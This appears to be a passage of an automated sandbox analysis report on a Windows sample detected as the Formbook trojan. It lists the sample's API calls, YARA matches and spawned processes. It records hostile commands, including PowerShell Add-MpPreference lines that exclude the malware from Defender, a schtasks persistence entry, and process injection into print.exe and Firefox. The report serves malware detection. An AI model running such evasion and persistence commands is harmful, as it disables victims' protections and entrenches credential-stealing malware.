                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_02E72BF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72BA0 NtEnumerateValueKey,LdrInitializeThunk,16_2_02E72BA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72B60 NtClose,LdrInitializeThunk,16_2_02E72B60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72EE0 NtQueueApcThread,LdrInitializeThunk,16_2_02E72EE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72E80 NtReadVirtualMemory,LdrInitializeThunk,16_2_02E72E80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72FE0 NtCreateFile,LdrInitializeThunk,16_2_02E72FE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72FB0 NtResumeThread,LdrInitializeThunk,16_2_02E72FB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72F30 NtCreateSection,LdrInitializeThunk,16_2_02E72F30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_02E72CA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72C60 NtCreateKey,LdrInitializeThunk,16_2_02E72C60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02E72C70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_02E72DF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72DD0 NtDelayExecution,LdrInitializeThunk,16_2_02E72DD0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72D30 NtUnmapViewOfSection,LdrInitializeThunk,16_2_02E72D30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72D10 NtMapViewOfSection,LdrInitializeThunk,16_2_02E72D10
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E735C0 NtCreateMutant,LdrInitializeThunk,16_2_02E735C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E739B0 NtGetContextThread,LdrInitializeThunk,16_2_02E739B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72AB0 NtWaitForSingleObject,16_2_02E72AB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72B80 NtQueryInformationFile,16_2_02E72B80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72EA0 NtAdjustPrivilegesToken,16_2_02E72EA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72E30 NtWriteVirtualMemory,16_2_02E72E30
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72FA0 NtQuerySection,16_2_02E72FA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72F90 NtProtectVirtualMemory,16_2_02E72F90
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72F60 NtCreateProcessEx,16_2_02E72F60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72CF0 NtOpenProcess,16_2_02E72CF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72CC0 NtQueryVirtualMemory,16_2_02E72CC0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72C00 NtQueryInformationProcess,16_2_02E72C00
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72DB0 NtEnumerateKey,16_2_02E72DB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E72D00 NtSetInformationFile,16_2_02E72D00
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73090 NtSetValueKey,16_2_02E73090
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73010 NtOpenDirectoryObject,16_2_02E73010
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73D70 NtOpenThread,16_2_02E73D70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E73D10 NtOpenProcessToken,16_2_02E73D10
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4D70 NtCreateFile,16_2_004C4D70
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4EA0 NtReadFile,16_2_004C4EA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4F60 NtDeleteFile,16_2_004C4F60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C4FE0 NtClose,16_2_004C4FE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C5110 NtAllocateVirtualMemory,16_2_004C5110
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E2D34C16_2_02E2D34C
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF132D16_2_02EF132D
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF70E916_2_02EF70E9
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFF0E016_2_02EFF0E0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EEF0CC16_2_02EEF0CC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E470C016_2_02E470C0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4B1B016_2_02E4B1B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E7516C16_2_02E7516C
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E2F17216_2_02E2F172
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F0B16B16_2_02F0B16B
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF16CC16_2_02EF16CC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E8563016_2_02E85630
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFF7B016_2_02EFF7B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E3146016_2_02E31460
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFF43F16_2_02EFF43F
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02F095C316_2_02F095C3
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EDD5B016_2_02EDD5B0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF757116_2_02EF7571
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EEDAC616_2_02EEDAC6
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EDDAAC16_2_02EDDAAC
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E85AA016_2_02E85AA0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EE1AA316_2_02EE1AA3
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB3A6C16_2_02EB3A6C
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFA4916_2_02EFFA49
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF7A4616_2_02EF7A46
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB5BF016_2_02EB5BF0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E7DBF916_2_02E7DBF9
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5FB8016_2_02E5FB80
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFB7616_2_02EFFB76
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E438E016_2_02E438E0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EAD80016_2_02EAD800
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E4995016_2_02E49950
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5B95016_2_02E5B950
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02ED591016_2_02ED5910
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E49EB016_2_02E49EB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E03FD216_2_02E03FD2
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E03FD516_2_02E03FD5
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFFB116_2_02EFFFB1
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E41F9216_2_02E41F92
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFF0916_2_02EFFF09
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EFFCF216_2_02EFFCF2
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EB9C3216_2_02EB9C32
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E5FDC016_2_02E5FDC0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF7D7316_2_02EF7D73
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02E43D4016_2_02E43D40
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_02EF1D5A16_2_02EF1D5A
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004B187016_2_004B1870
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004ACAC016_2_004ACAC0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004ACCE016_2_004ACCE0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004AAD6016_2_004AAD60
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004B2FAD16_2_004B2FAD
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004B2FB016_2_004B2FB0
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004C732016_2_004C7320
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB906816_2_00BB9068
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB9B4416_2_00BB9B44
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB9C6416_2_00BB9C64
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_00BB9FFE16_2_00BB9FFE
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: String function: 011CEA12 appears 36 times
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeCode function: String function: 011A7E54 appears 97 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02E75130 appears 58 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02E2B970 appears 280 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02EAEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02E87E54 appears 111 times
                    Source: C:\Windows\SysWOW64\print.exeCode function: String function: 02EBF290 appears 105 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 0189B970 appears 280 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 0191EA12 appears 86 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 018E5130 appears 58 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 018F7E54 appears 111 times
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: String function: 0192F290 appears 105 times
                    Source: UnmxRI.exe, 00000000.00000002.2090039067.00000000038E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000000.00000002.2077241511.00000000006BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000000.00000002.2101231859.0000000007190000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrint.Exej% vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000009.00000002.2230462145.000000000199D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs UnmxRI.exe
                    Source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001428000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePrint.Exej% vs UnmxRI.exe
                    Source: UnmxRI.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                    The rule matched in each of the following sources:
                    Source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.cs Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: _0020.SetAccessControl
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs Security API names: _0020.AddAccessRule
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, QvFRFSSlmclI2FDck0.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QvFRFSSlmclI2FDck0.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, QvFRFSSlmclI2FDck0.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/16@16/9
                    Source: C:\Users\user\Desktop\UnmxRI.exe File created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Mutant created: \Sessions\1\BaseNamedObjects\lvtQuFzxsXQOCORNnGxcc
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                    Source: C:\Users\user\Desktop\UnmxRI.exe File created: C:\Users\user\AppData\Local\Temp\tmpB814.tmp
                    Source: UnmxRI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: UnmxRI.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\UnmxRI.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\UnmxRI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: print.exe, 00000010.00000003.2443596654.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4494834964.0000000000943000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2443596654.0000000000911000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4494834964.0000000000911000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2443548518.0000000000923000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: UnmxRI.exe ReversingLabs: Detection: 65%
                    Source: UnmxRI.exe Virustotal: Detection: 68%
                    Source: C:\Users\user\Desktop\UnmxRI.exe File read: C:\Users\user\Desktop\UnmxRI.exe
                    Source: unknown Process created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\UnmxRI.exe Process created: C:\Users\user\Desktop\UnmxRI.exe "C:\Users\user\Desktop\UnmxRI.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe Process created: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe Process created: C:\Windows\SysWOW64\print.exe "C:\Windows\SysWOW64\print.exe"
                    Source: C:\Windows\SysWOW64\print.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
